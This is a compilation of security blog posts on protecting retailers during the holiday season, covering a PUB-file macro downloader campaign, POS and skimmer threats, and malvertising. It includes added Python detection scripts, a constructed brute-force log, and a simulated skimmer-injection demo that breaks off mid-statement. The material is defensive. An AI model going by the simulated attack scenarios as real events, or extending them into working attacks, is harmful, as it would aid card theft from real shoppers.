
New Macro Downloaders Use PUB Files to Compromise Food and Retail Companies

New macro downloaders are using Microsoft Publisher (PUB) files and spam emails to serve up network compromise in the food and retail sectors.

According to Trend Micro, the campaign ramped up late last month with over 50 food and retail companies spammed between Nov. 20–27. Targets included food sector companies Starbucks and Taco Del Mar and retailers Harris Teeter and Save Mart Supermarkets. Trend Micro also detected attacks against the U.S. Department of Agriculture and the financial sector dating to the first week in November.

Setting this campaign apart is its use of PUB files, which are not commonly associated with macro malware. Combined with socially engineered spam emails from “operations teams,” these PUB invoices appear legitimate. Once opened, they serve up malicious Microsoft Installer (MSI) files that contact command-and-control (C&C) servers to install remote access Trojans (RATs). Given the lack of PUB files used by macro downloaders and the use of MSI files for legitimate installations, infections may go unnoticed by both users and standard antimalware tools.

Spam Is a Recipe for Disaster During the Holidays

Both retail and food companies are gearing up for their busiest quarter of the year, which could increase their likelihood of falling victim to spam attacks. Cybercriminals’ use of PUB files enhances this risk, since employees may not recognize these files as potential threats. Installed RATs can then hide in plain sight until attackers are ready to conduct reconnaissance or download new malware tools.

The campaign also prioritizes evasion by scheduling the MSI file download rather than completing it immediately after the PUB file is opened. This not only delays infection to confound security measures, but also hands the job to a scheduled task that runs “msiexec,” so the installer is downloaded and executed automatically without further user interaction.

Address the Threat of Macro Downloaders and PUB Attacks

Seasonal spam campaigns come with a high price: Lurking RATs could target customer data or compromise corporate networks. To avoid sneaky PUB attacks, IBM experts recommend investing in layered email security services that combine perimeter protection, external mail scanning and spam control. Security teams should also segment their networks to separate critical services, point-of-sale (POS) information and consumer financial data, limiting the damage caused by successful spam deliveries.

Source: Trend Micro

The post New Macro Downloaders Use PUB Files to Compromise Food and Retail Companies appeared first on Security Intelligence.

5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays

This is the second article in a two-part series about retail cybersecurity during the holidays. Read part one for the full list of recommendations.

The holiday shopping season offers myriad opportunities for threat actors to exploit human nature and piggyback on the rush to buy and sell products in massive quantities online. Our previous post covered some network security basics for retailers. Let’s take a closer look at how retailers can properly configure and monitor their networks to help mitigate cyberattacks and provide customers with a safe shopping experience during the holiday season.

1. Take a Baseline Measurement of Your Network Traffic

Baselining is the process of measuring normal amounts of traffic over a period of days or even weeks to discern any suspicious traffic peaks or patterns that could reveal an evolving attack.

Network traffic measurements should be taken during regular business hours as well as after hours to cover the organization’s varying activity phases. As long as the initial baseline is taken during a period when traffic is normal, the data can be considered reliable. An intrusion detection system (IDS) or intrusion prevention system (IPS) can then assist with detecting abnormal traffic volumes — for example, when an intruder is exfiltrating large amounts of data when offices are closed.

Below are some factors to consider when performing a baseline measurement that could be helpful in detecting anomalies:

  • Baseline traffic on a regular basis.
  • Look for atypical traffic during both regular and irregular times (e.g., after hours).
  • Set alarms on an IDS/IPS for high and low thresholds to automate this process. Writing signatures specific to your company’s needs is a key element to an IDS/IPS working effectively and should be carried out by trained security specialists to avoid false alarms.
  • Investigate any discrepancies upon initial discovery and adjust thresholds accordingly.
  • Consider using an endpoint detection and response (EDR) solution to help security teams better identify threats, and to allow operations teams to remediate endpoints quickly and at scale.
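The baseline-and-threshold idea above can be made concrete in a few dozen lines. The following is an added example, not code from the article or from IBM: it builds a per-window (business hours versus after hours) baseline from a constructed week of hourly outbound byte counts, then classifies a new observation as high, low or normal against mean ± k·σ for that window, which is exactly the kind of high and low alarm the list recommends automating on an IDS/IPS. The window boundaries, the constructed traffic levels and the k = 3 threshold are assumptions chosen for illustration.

```python
"""Per-window traffic baseline with high/low threshold alarms (added example)."""
from datetime import datetime, timedelta
from statistics import mean, pstdev


def window_of(ts):
    """Assumed activity phases: 08:00-18:00 is business, everything else after hours."""
    return "business" if 8 <= ts.hour < 18 else "after_hours"


def constructed_samples():
    """Constructed sample data: one week of hourly outbound byte counts.

    Deterministic jitter of +/-5% stands in for real variation so the
    example runs offline; in practice these would come from flow records.
    """
    samples = []
    start = datetime(2018, 11, 5, 0, 0)  # a Monday
    for h in range(24 * 7):
        ts = start + timedelta(hours=h)
        base = 400_000_000 if window_of(ts) == "business" else 20_000_000
        jitter = ((h * 37) % 11 - 5) / 100.0  # -0.05 .. +0.05
        samples.append((ts, int(base * (1 + jitter))))
    return samples


def build_baseline(samples):
    """Return {window: (mean_bytes, stddev_bytes)} from (timestamp, bytes) pairs."""
    buckets = {}
    for ts, nbytes in samples:
        buckets.setdefault(window_of(ts), []).append(nbytes)
    return {w: (mean(v), pstdev(v)) for w, v in buckets.items()}


def classify(baseline, ts, nbytes, k=3.0):
    """Compare one hourly observation against its window's mean +/- k*sigma."""
    mu, sigma = baseline[window_of(ts)]
    high = mu + k * sigma
    low = max(0.0, mu - k * sigma)  # byte counts cannot go negative
    if nbytes > high:
        return "high"    # e.g. bulk exfiltration while offices are closed
    if nbytes < low:
        return "low"     # e.g. a sensor or link that went quiet
    return "normal"


def check_observation(baseline, iso_ts, nbytes, k=3.0):
    """Convenience wrapper taking an ISO-8601 timestamp string."""
    return classify(baseline, datetime.fromisoformat(iso_ts), nbytes, k)


def run_example():
    """Score a few constructed observations; returns {label: verdict}."""
    baseline = build_baseline(constructed_samples())
    observations = {
        "quiet_night": ("2018-11-13T02:00:00", 20_000_000),
        "night_exfil": ("2018-11-13T02:00:00", 3_000_000_000),
        "dead_sensor": ("2018-11-13T03:00:00", 0),
        "busy_afternoon": ("2018-11-13T14:00:00", 405_000_000),
    }
    return {name: check_observation(baseline, ts, b) for name, (ts, b) in observations.items()}


if __name__ == "__main__":
    for name, verdict in run_example().items():
        print(f"{name:15s} {verdict}")
```

The important design point is that the baseline is keyed by activity phase: a 3 GB hour is unremarkable for a busy afternoon but is dozens of standard deviations above normal at 02:00, which is why the article stresses measuring after-hours traffic separately. Re-run `build_baseline` periodically on fresh data so the thresholds track legitimate growth, and review anything flagged before widening them.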


2. Run a Penetration Test Before It’s Too Late

A key preventative measure for retailers with a more mature security posture is running a penetration test. Simply put, the organization’s security team can allow a white hat hacker, or penetration tester, to manually try to compromise assets using the same tactics, techniques and procedures (TTPs) as criminal attackers. This is done to ascertain whether protections applied by the organization are indeed working as planned and to find any unknown vulnerabilities that could enable a criminal to compromise a high-value asset.

Manual testing should be performed in addition to automated scanning. Whereas automated tools can find known vulnerabilities, manual testing finds the unknown vulnerabilities that tools alone cannot find. Manual testing also targets the systems, pieces of information and vulnerabilities most appealing to an attacker, and specifically focuses on attempting to exploit not just technical vulnerabilities within a system, but business logic errors and other functionality that, when used improperly, can grant unintended access and/or expose sensitive data.

The key to a penetration test is to begin by assessing vulnerabilities and addressing as many of them as possible prior to the test. Then, after controls are in place, decide on the type of test to carry out. Will it be a black box test, where the testers receive no information about the target’s code and schematics? Or will it be a white box test, where organizations fully disclose information about the target to give the tester full knowledge of how the system or application is intended to work? Will it be in a very specific scope and only include customer-facing applications?

It can be helpful to scope a penetration test by taking the following three steps prior to launching the testing period:

  1. Establish goals for the testing. Since penetration testing is intended to simulate a real-world attack, consider scenarios that are relevant to your organization. Giving thought to what type of data is at risk or what type of attacker you’re trying to simulate will allow the testers to more closely approximate threats relevant to your organization.
  2. Draft a thorough contract to state the expectations and scope of the project. For example, if there are specific areas a penetration tester should not access based on criticality or sensitivity, such as production servers or credit card data, outline these points in the contract. Also, define whether the penetration testers should attempt to compromise both physical access and remote access to compromise networks, or if just one is preferred. Consider if you wish to have social engineering included within the test as well.
  3. Have the vendor and its employees sign nondisclosure agreements (NDAs) to keep their findings confidential and ensure their exclusive use by the organization.

Penetration testers from reputable companies are thoroughly vetted before being allowed to conduct these tests. The retail industry can benefit from this type of testing because it mimics the actions of a threat actor and can reveal specific weaknesses about an organization. It can even uncover deficiencies in staff training and operational procedures if social engineering is included within the scope of the testing.

3. Check Your Log Files for Anomalies

Log data collected by different systems throughout an organization is critical in investigating and responding to attacks. Bad actors know this and, if they manage to breach an organization and gain elevated privileges, will work to cover up their tracks by tampering with logs.

According to IBM X-Force Incident Response and Intelligence Services (IRIS) research, one of the most common tactics malicious actors employ is post-intrusion log manipulation. Looking to keep their actions concealed, attackers will attempt to alter or delete entries in log files, or inject fake ones. Compromising the integrity of security logs can delay defenders’ efforts to find out about malicious activity. Additional controls and log monitoring can help security teams avoid this situation.

Below are some helpful tips and examples of security logs that must be checked to determine whether anything is out of the ordinary.

  • Are your logs being tampered with? Look for altered timestamps, missing entries, additional or duplicate entries, and anomalous login attempts.
  • Transfer old log files to a restricted zone on your network. This can help preserve the data and create space for logs being generated overnight.
  • Use a security information and event management (SIEM) tool to assist with analyzing logs and identifying anomalies reported by your organization’s security controls.
  • To include as many sources of information as possible, plug in endpoint, server, network, transaction and security logs for analysis by a SIEM system. Look for red flags such as multiple failed logins, denied access to sensitive areas, ping sweeps, etc.
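The checks in the first and last bullets above (altered timestamps, duplicate entries, missing entries, and repeated failed logins) are simple enough to script. The block below is an added example written for this page, not code from the article or from IBM X-Force IRIS: it parses a constructed set of syslog-style authentication lines from a POS host, reports timestamp regressions, exact duplicates and suspicious gaps, and counts failed-login bursts per source address within a sliding window, then notes any successful login from a source that had just been bursting. The log format, host name, addresses, the one-hour gap threshold and the five-failures-per-minute rule are all assumptions made for the example.

```python
"""Scan auth-log lines for tampering indicators and failed-login bursts (added example)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Assumed line layout: "<ISO timestamp> <host> <process>: <message>"
LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) (?P<proc>[^:]+): (?P<msg>.*)$")
FAIL_RE = re.compile(r"Failed password for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")
ACCEPT_RE = re.compile(r"Accepted password for (?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)")

# Constructed sample log (not from any real system). Line 9 steps backwards in
# time, line 10 is an exact copy of line 8, and line 11 follows a 3.5-hour gap.
SAMPLE_LOG = """\
2018-11-20T02:00:01 pos-07 sshd[412]: Accepted password for svc_pos from 10.0.5.21 port 51022
2018-11-20T02:00:15 pos-07 sshd[415]: Failed password for root from 10.0.9.200 port 40001
2018-11-20T02:00:17 pos-07 sshd[416]: Failed password for root from 10.0.9.200 port 40002
2018-11-20T02:00:20 pos-07 sshd[417]: Failed password for root from 10.0.9.200 port 40003
2018-11-20T02:00:22 pos-07 sshd[418]: Failed password for root from 10.0.9.200 port 40004
2018-11-20T02:00:25 pos-07 sshd[419]: Failed password for root from 10.0.9.200 port 40005
2018-11-20T02:00:29 pos-07 sshd[420]: Failed password for root from 10.0.9.200 port 40006
2018-11-20T02:01:03 pos-07 sshd[431]: Accepted password for root from 10.0.9.200 port 40008
2018-11-20T01:55:00 pos-07 cron[500]: (root) CMD (run-parts /etc/cron.hourly)
2018-11-20T02:01:03 pos-07 sshd[431]: Accepted password for root from 10.0.9.200 port 40008
2018-11-20T05:30:00 pos-07 sshd[600]: Accepted password for svc_pos from 10.0.5.21 port 51100
"""


def parse(text):
    """Turn raw lines into records; unparseable lines keep ts=None so they are still reported."""
    records = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.match(line)
        if not m:
            records.append({"line": n, "ts": None, "host": None, "msg": "", "raw": line})
            continue
        records.append({"line": n, "ts": datetime.fromisoformat(m["ts"]),
                        "host": m["host"], "msg": m["msg"], "raw": line})
    return records


def find_tampering(records, max_gap_seconds=3600):
    """Return [(kind, line_no)] for duplicates, backwards timestamps, gaps and bad lines."""
    findings, seen, prev = [], set(), None
    for r in records:
        if r["raw"] in seen:
            findings.append(("duplicate", r["line"]))
        seen.add(r["raw"])
        if r["ts"] is None:
            findings.append(("unparseable", r["line"]))
            continue
        if prev is not None:
            delta = (r["ts"] - prev["ts"]).total_seconds()
            if delta < 0:
                findings.append(("timestamp_regression", r["line"]))
            elif delta > max_gap_seconds:
                findings.append(("gap", r["line"]))  # possible deleted entries or stopped logging
        prev = r  # compare each line with the one physically before it
    return findings


def failed_login_bursts(records, threshold=5, window_seconds=60):
    """Return {ip: peak failures within any window} for sources reaching the threshold."""
    per_ip, hits = defaultdict(deque), {}
    for r in records:
        m = FAIL_RE.search(r["msg"]) if r["ts"] is not None else None
        if not m:
            continue
        q = per_ip[m["ip"]]
        q.append(r["ts"])
        while q and (r["ts"] - q[0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            hits[m["ip"]] = max(hits.get(m["ip"], 0), len(q))
    return hits


def success_after_burst(records, bursts):
    """Line numbers of successful logins from sources that were bursting failures."""
    out = []
    for r in records:
        m = ACCEPT_RE.search(r["msg"])
        if m and m["ip"] in bursts:
            out.append(r["line"])
    return out


def analyze(text=SAMPLE_LOG):
    records = parse(text)
    bursts = failed_login_bursts(records)
    return {"tampering": find_tampering(records), "bursts": bursts,
            "success_after_burst": success_after_burst(records, bursts)}


if __name__ == "__main__":
    for key, value in analyze().items():
        print(key, value)
```

Two caveats worth keeping in mind when adapting this. A timestamp that runs backwards is only meaningful if the source writes entries in order, so NTP drift and batched forwarders will produce false positives until you tune the comparison; and exact-duplicate detection catches a replayed line but not a forged one, which is why the article pairs these checks with shipping logs off the host to a restricted zone and into a SIEM, where the original copy cannot be edited by whoever compromised the endpoint.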

Knowing which logs to investigate is also critical to successful log analysis. For example, point-of-sale (POS) systems are often installed on Microsoft Windows or Linux systems. It is therefore critical to review operating system logs for these particular endpoints. When it comes to POS networks, where many of the devices are decentralized, daily usage, security and application logs are good places to look for anomalies.

For network security, use logs from network appliances to determine failed or excessive login attempts, increases or decreases in traffic flow, and unauthorized access by users with inadequate privilege levels.

4. Balance Your Network and Website Traffic

According to the National Retail Federation, online sales from November and December 2017 generated more than $138.4 billion, topping 2016 sales by 11.5 percent. This year is likely going to set its own record. With internet traffic volumes expected to be at their highest, online retailers that are unprepared could see the loss of sales and damaged reputation in the aftermath of the holiday season.

But preparing for extra shoppers is the least of retailers’ worries; attackers may take advantage of the festive time of year to extort money by launching distributed denial-of-service (DDoS) attacks against retail websites. These attacks work by flooding a website or network with more traffic than it can handle, causing it to cease accepting requests and stop responding.

To stay ahead of such attacks, online retailers can opt to use designated controls such as load balancers. Load balancers are an integral part of preventing DDoS attacks, which can affect POS systems storewide. With a well-coordinated DDoS attack, a malicious actor could shut down large parts of their target’s networks.

One best practice is to prepare before traffic peaks. Below are some additional tips for a more balanced holiday season.

  • Preventing a DDoS attack can be an imposing undertaking, but with a load balancing device, most of this work can be automated.
  • Load balancers can be either hardware devices or virtual balancers that work to distribute traffic as efficiently as possible and route it to the server or node that can best serve the customer at that given moment. In cases of high traffic, it may take several load balancers to do the work, so evaluate and balance accordingly.
  • Load balancers can be programmed to direct traffic to servers dedicated to customer-facing traffic. Using them can also enable you to move traffic to the proper location instead of inadvertently allowing access to forbidden areas.

Load balancers are typically employed by larger companies with a prominent web footprint. However, smaller companies should still consider employing them because they serve a multitude of purposes. Keeping the load on your servers balanced can help network and website activity run smoothly year-round and prevent DDoS attacks from doing serious damage to your organization’s operations or web presence.

5. Plan and Practice Your Incident Response Strategy

An incident response (IR) plan is essential to identifying and recovering from a security incident. Security incidents should be investigated until they have been classified as true or false positives. The more timely and coordinated an organization’s response is to an incident, the faster it can limit and manage the impact. A solid IR plan can help contain an incident rapidly and result in better protection of customer data, reduction of breach costs and preservation of the organization’s reputation.

If your enterprise does not have an IR plan, now is the time to create one. In the event that your enterprise already has a plan, take the time to get key stakeholders together to review it and ensure it is up-to-date. Most importantly, test and drill the plan and document its effectiveness so you’re prepared for the attack scenarios most relevant to your organization.

When evaluating an IR plan, consider the following tips to help accelerate your organization’s response time:

  • Threat actors who compromise retail cybersecurity will typically turn stolen data around quickly for a profit on the dark web. Use dark web search tools to look for customer data that may have been compromised. Sometimes, data can be identified by the vendor that lost it, leading to the detection of an ongoing attack.
  • Before an attack occurs, establish a dedicated IR team with members from different departments in the organization.
  • Make sure each team member knows his or her precise role in the case of an incident.
  • Keep escalation charts and runbooks readily available to responders, and make sure copies are available offline and duplicated in different physical locations.
  • Test your IR strategy under pressure in an immersive cyberattack simulation to find out where the team is strong and what may still need some fine-tuning.

Make Retail Cybersecurity a Year-Round Priority

Increased vigilance is important for retailers during the holiday season, but these network security basics and practices can, and should, be maintained throughout the year. Remember, attackers don’t just wait until the holiday season to strike. With year-round preparation, security teams can mitigate the majority of threats that come their way.


The post 5 More Retail Cybersecurity Practices to Keep Your Data Safe Beyond the Holidays appeared first on Security Intelligence.

Security Affairs: 4 Industries That Have to Fight the Hardest Against Cyberattacks

Society’s dependence on internet-based technologies means security professionals must defend against cyberattacks as well as more traditional threats, such as robbers or disgruntled employees.

However, cybercriminals target some industries at disproportionally high rates. Here are four of them:

1. Health Care

Since health care professionals deal with life-or-death situations, cyberattacks could hinder both productivity and patient care to a tremendous degree. Some attacks shut down entire health systems comprising multiple facilities, or force affected individuals to switch from computerized processes to using pens and paper.

The medical industry faces an exceptional risk for cyberattacks because there are so many players involved in the sector. More than 83 percent of organizations responding to a recent survey reported making new or improved organizational security enhancements.

That’s notable progress, but analysts also worry about the potential for attacks that don’t directly target hospitals or similar organizations. Recent demonstrations from cybersecurity researchers have shown how it’s possible to hack into medical devices like pacemakers or insulin pumps.

There are also instances of hospitals being unable to perform fundamental services. In November 2018, a ransomware attack forced two hospitals to send ambulances elsewhere and only accept walk-up patients to the emergency rooms.

Hackers know they can wreak substantial havoc by attacking hospitals, thereby increasing the potential for notoriety. It doesn’t hurt that those organizations keep medical records containing valuable information hackers could sell on the black market. One instance with North Carolina-based company Atrium Health potentially breached the data of 2.65 million people.

2. Nonprofit

Nonprofits typically focus their efforts on causes that improve society at large, at-risk groups and others in need. However, cyberattacks could thwart all those intentions to put energy toward the greater good. Research indicates cyberattacks threaten nonprofit organizations for various reasons.

Data from 2017 found only 27 percent of nonprofits broke even that year. So, if nonprofit leaders want to devote more money to cybersecurity, they may feel too financially strapped to make meaningful progress. Plus, many nonprofits have small teams of hired employees and rely heavily on volunteers otherwise. That bare-bones staffing structure could make it harder than average for nonprofits to recover after issues happen.

Also, nonprofits may feel overwhelmed about where to start as they learn about cybersecurity. Fortunately, some products geared toward nonprofits have robust integrated security. Volgistics is a company associated with volunteer management that serves 5,121 organizations. A section on its website details the online and offline measures taken to keep customer data safe.

3. Retail

The retail industry is cyclical, so certain times of the year — including the holiday season or when kids go back to school — are particularly busy. Plus, cybercrime problems could take websites offline or cause reputational damage. Despite those risks, retailers make blunders when budgeting for cybersecurity. A recent report found 50 percent of all data breaches in the U.S. happened at retail establishments.

The study also determined that entities spend the most money on cybersecurity measures considered among the least effective. No matter what, it’s crucial for the retail sector to take cybersecurity seriously. Research from Gemalto found 70 percent of people would stop doing business with companies that suffer data breaches. So, failing to conquer the problem could lead to profit losses in unexpected ways.

4. Financial Services

People rely on banks to do daily transactions for business or personal reasons. And, since financial institutions have extraordinary amounts of money on hand, it’s not surprising they’re prime targets for cybercriminals. Even financial industry businesses that don’t store so many financial resources on site — such as wealth management companies — keep documents filled with clients’ personal details.

The financial sector is also so potentially lucrative for hackers that they may set their sights on carrying out attacks on ATMs in multiple countries. Sources report a North Korean hacking group known as Lazarus is believed to be behind attacks in 23 countries totaling tens of millions of dollars.

There’s an emerging trend of banks hiring ethical hackers to find vulnerabilities and test existing safeguards. That’s a practical way to address cybercrime risks, but it’s an approach that’ll likely become increasingly harder to choose. That’s because there’s already a gigantic cybersecurity skills gap consisting of hundreds of thousands of open cybersecurity positions, and forecasts say the shortage will get worse.


No Industry Is Immune

Any sector that uses the internet to conduct business could become a cybercriminal’s target.

Although the industries mentioned here need to take particular care to prevent issues, proactive steps taken to fix problems and monitor for suspicious issues could keep all companies safer from cybercrime.

About the author

Kayla Matthews is a technology and cybersecurity writer, and the owner of ProductivityBytes.com. To learn more about Kayla and her re

Pierluigi Paganini

(Security Affairs – Cybersecurity, cyberattacks)

The post 4 Industries That Have to Fight the Hardest Against Cyberattacks appeared first on Security Affairs.




‘Tis the Season for Spreading Ad Malware

Although Black Friday and Cyber Monday are behind us, consumer scams are likely to continue surging through the coming month. Malicious actors know that online retail spikes during the holiday season, so they increase their efforts to spread ad malware rather than good cheer.

Cautious consumers might be on the lookout for malicious apps and websites, but another tactic that cybercriminals will likely leverage extensively is malvertising — ads embedded with malware. Retailers also tend to prioritize customer experience over data security, so it’s important to understand how to avoid malvertising scams and prevent opportunistic threat actors from affecting your network during the holiday season.

Recognize the Risk

According to a Black Friday digital fraud report from RiskIQ, “Some fake apps contain adware and ad clicks or malware that can steal personal information or lock the device until the user pays a ransom. Others encourage users to log in using their Facebook or Gmail credentials, potentially exposing sensitive personal information.” In fact, the researchers from RiskIQ found that the brand names of the five leading retailers were frequently used in malicious and fraudulent mobile apps.

With virtually every retailer promoting online shopping deals, the internet is a hotbed of opportunity for scams. Jerome Dangu and Jack Cohen Martin, co-founder and chief technology officer (CTO), respectively, of antimalvertising firm Confiant, said they uncovered what appeared to be the initial attack in an ongoing malvertising campaign on Nov. 12. During the course of discovery, Confiant blocked over 5 million malvertising impressions on the Google Play store meant to impersonate legitimate app downloads.

Because the ads were served in a top-tier exchange, more than 300 million bad impressions were served to publishers in just over a 48-hour period, Dangu and Cohen Martin explained. By comparison, the Zirconium group, named by Confiant as 2017’s largest malvertising operation, created and operated 28 fake ad agencies to distribute malvertising campaigns and was responsible for 1 billion impressions over the course of a full year.

Malvertising can target specific companies, but this particular campaign went after iOS users and used two domains and two types of payloads.

“One family of landing pages was more focused on fake offers from Amazon gift cards and Walmart, in differing denominations and variations,” Dangu explained.

How to Spot an Ad Malware Scam

The scam is essentially a way for an attacker to retrieve user data and resell it. Users are often delivered to fraudulent landing pages where they are asked different types of marketing questions about things like their insurance or interest in electronics.

“The attacker is getting an affiliation share on these forms that get submitted, but you can never get out of this loop of forms,” Dangu explained. “Users could enter their data forever until they finally realize it’s a waste of time and they aren’t getting an iPhone for a dollar.”

Because malicious actors have become increasingly sophisticated, the fraudulent landing pages they use appear legitimate.

“They are exploiting the user’s trust by creating malicious landing pages that adopt the same color scheme as Facebook or Google, for example. It’s important for users to make sure they are where they think they are and check the full URL address,” Cohen Martin said.

All Eyes on Mobile

In monitoring malicious traffic over the last year, Confiant saw one major change from the previous years that saw surges in malware and malvertising campaigns on browsers.

“Mobile is used more and more,” Dangu said. “Attackers are targeting more mobile through scam approaches, which is disturbing for publishers.”

In one case, ads were redirecting users to get them to subscribe to adult dating sites, and the cybercriminals were getting a cut on those subscriptions. Mobile sites tend to have more ads, and because of that density, it is more difficult to identify a scam.

“Because of the nature of business, the ads are being digitally placed there, and it is hard to get 100 percent visibility into what is going on,” said Dangu. “Service providers and exchanges need to do their part to prevent these types of risks from being available.”

How to Avoid Malvertising Scams

Given the evolution of scammers’ methods, it’s important to remember that if a deal seems too good to be true, it probably is.

“Consumers should be wary of deals and go directly to sites they trust,” said Mike Bittner, digital security and operations manager of The Media Trust.

Bittner also emphasized the responsibility of brands to identify all the code executing on their websites and mobile apps.

“Chances are high that online companies only know a small fraction of the 50–95 percent of code in their digital assets provided by third parties,” he said.

Security leaders can help protect their employees by integrating a holiday retail scam identification practice into their regular security awareness training program. They can also defend networks by deploying artificial intelligence-enabled software to flag anomalous behaviors that could potentially represent a breach.

Consumers have a choice when visiting e-commerce sites. Although it’s advisable to rely on trusted, reputable brands with strong ratings, cybercriminals are eager to exploit that trust by visually replicating those very brands. Staying cautious and fully aware of your online navigations will help you to remain safe during the holiday season and all year long.

The post ‘Tis the Season for Spreading Ad Malware appeared first on Security Intelligence.

5 Recommendations to Improve Retail Cybersecurity This Holiday Season

This is the first installment in a two-part series about how retailers can help protect their enterprises this holiday season.

With the holiday season upon us, retailers have an opportunity to boost revenues before the end of the year. Any increase in profit at the expense of retail cybersecurity, however, can cost a company more in the long run, given the rising size and costs of data breaches and associated revenue and reputational loss. With extra web traffic and high order volumes coming in, the holiday shopping season can be a particularly perilous time for businesses seeking to safeguard customer information.

A Timely Cause for Retail Cybersecurity Concerns

'Tis the season for retailers to buckle down on security, since data breaches typically peak just prior to and during the holiday shopping season. IBM X-Force Incident Response and Intelligence Services (IRIS)'s assessment of X-Force Interactive Security Incident data recorded between 2012 and 2017 revealed that 41 percent of all retail and consumer product breaches occurred between September and December, elevating the risk of enterprise network breaches during that time of year. More than two-thirds of all records in the consumer products sector were leaked, lost or stolen during these last four months of the year — nearly 180 million records each year.

Don’t Reward the Naughty

A growing number of retailers now offer rewards programs to retain and nurture their customer bases. For shoppers to join these programs, most retailers ask for personally identifiable information (PII) such as name, address, phone number and email address. If this data is ever compromised, an attacker can correlate it with payment data and aggregate enough information to take over the customer's identity.

In line with recent regulations such as the General Data Protection Regulation (GDPR), retailers should collect the minimum PII necessary, have a clear purpose for each data element, and keep the data encrypted and safeguarded both in transit and at rest.

Phishing Is in Season

Attackers don’t wait for the holiday season to begin launching spam campaigns, which are often employed as the first stage of their overall fraud and attack campaigns. Analysis of X-Force spam honeypot data collected between 2015 and 2018 revealed a notable rise in the average volume of spam emails beginning in August, with September slightly lower and October ranking third.

Figure 1: Average spam per month, total volume of spam emails recorded, 2015–2018 (Source: IBM X-Force)

Preventing and responding to data breaches leading up to and during the holiday shopping season has become imperative. It is incumbent on retail security professionals to perform due diligence during this time, and there are several ways to accomplish this goal.

Below are five holiday season tips for retailers to help make your enterprise a safer shopping environment. These techniques can help retailers identify impending data breaches and sidestep the costs associated with a major data breach.

While I’ve listed these tips in the order of what I generally consider to be top-of-mind for retailers, this list can be customized to serve your organization’s specific needs.

1. Mitigate the POS Malware Threat

After a popular big box retailer suffered a breach in 2013, public awareness around the vulnerability of point-of-sale (POS) systems grew exponentially. That breach was facilitated by malware that infected POS machines and helped threat actors access a large volume of credit card information to sell to other criminals on the dark web. This intrusion resulted in the theft of more than 110 million records.

Five years later, POS malware continues to plague retailers. According to IBM X-Force, 74 percent of publicly reported POS malware breaches in 2017 impacted the retail sector. X-Force IRIS has observed malicious actors using POS malware, such as FrameworkPOS and PoSeidon, to siphon credit card data from POS terminals. Web-based malware, which steals credit card data on the fly as online transactions are processed, is also gaining steam.

To help mitigate these risks, both in physical and virtual realms, retailers should take the following steps:

  • Use some form of malware detection across the entire network, including the POS network.
  • Test the devices’ hardware and software (more to come on penetration testing in the second installment of this series) and keep devices up-to-date through regular patching.
  • Work with a supplier that will contractually adhere to both your regulatory standards and security requirements.
  • When using mobile POS, have controls in place to ensure the integrity of the hand-held device and the encryption of its communication channels with the server that processes and stores card data.
  • Ensure any mobile payment system is from a trusted provider that supplies regular updates, patches, and equipment upgrades to comply with advances in encryption requirements and evolving threats.

Cybercriminals also commonly steal credit card data through payment card skimmers. These physical devices are fitted into the mouth of card readers and work by copying track data from the credit card and storing it on a memory chip inside the skimming device. In addition to retail establishments, skimmers are often found in ATMs, restaurants and gas stations.

As a precaution, retailers should regularly inspect their POS terminals and card readers for attached devices. Attackers typically slide skimmers over the card slot and return later to collect them. Examine devices daily and pull on the reader if anything looks different; if part of the device comes off, it may be a skimmer. Report it to your service provider and IT security team before resuming activity on that terminal.

With security controls and practices becoming more efficient, threat actors have resorted to gluing card skimmers to machines. This makes it difficult to detach by simply pulling it off the affected device. Retailers should train employees in all locations to recognize the proper look and components of their POS terminals and swiping devices. Employees should also know how to report suspicious devices.

2. A Clean Network Is a Safe Network

Payment card data carries immediate monetary value to criminals, and there are many methods by which they aim to steal it.

One tactic IBM X-Force researchers have seen increasingly often is the injection of malicious code into legitimate e-commerce websites. By compromising websites where people shop online, attackers can send payment data submitted during customer checkout to their own infrastructure.

To help reduce the likelihood of becoming a feeding ground for criminals, online retailers should take the following steps:

  • Harden the security of underlying web servers.
  • Limit access to critical assets and properly manage the privileges of those that maintain them.
  • Ensure that web applications are secure, harden them against threats like SQL injections and other common attacks, and have them tested regularly.
  • Deploy a change monitoring and detection solution to spot unauthorized modifications to your e-commerce platform’s web hosting directories. If this is not feasible, schedule periodic, manual reviews of these assets.
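As an added example (not code from the original article or from IBM X-Force), the following Python script shows the kind of change detection the last bullet describes: it hashes every file under a web root, keeps the result as a baseline, and on the next scan reports which files were added, removed or modified. The web root, file names and the injected checkout script are constructed in a temporary directory so the script runs offline.

```python
"""Baseline-and-diff integrity check for an e-commerce web root.

Added example, not code from the original article. The web root and the
simulated skimmer injection below are constructed in a temporary directory.
"""
import hashlib
import os
import tempfile
from pathlib import Path


def hash_file(path: Path) -> str:
    """SHA-256 of a file, streamed so large assets are not loaded into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str, skip_suffixes=(".log", ".tmp")) -> dict:
    """Map every file under root (relative POSIX path) to its content hash.

    Rotating logs and scratch files are skipped so they do not create noise;
    everything served to customers (HTML, JS, templates, server-side code) is covered.
    """
    root_path = Path(root)
    baseline = {}
    for dirpath, _dirs, files in os.walk(root_path):
        for name in files:
            p = Path(dirpath) / name
            if p.suffix in skip_suffixes:
                continue
            baseline[p.relative_to(root_path).as_posix()] = hash_file(p)
    return baseline


def diff_baseline(old: dict, new: dict) -> dict:
    """Classify the differences between two baselines."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in old.keys() & new.keys() if old[k] != new[k]),
    }


def demo() -> dict:
    """Build a small web root, baseline it, simulate a skimmer injection, rescan."""
    with tempfile.TemporaryDirectory() as root:
        (Path(root) / "js").mkdir()
        (Path(root) / "index.html").write_text("<html>shop</html>")
        (Path(root) / "js" / "checkout.js").write_text("function pay(){}")
        (Path(root) / "access.log").write_text("ignored by the scan")
        before = build_baseline(root)

        # Constructed compromise: the checkout script is altered to post card data
        # to an attacker host, and an extra script is dropped into the tree.
        (Path(root) / "js" / "checkout.js").write_text(
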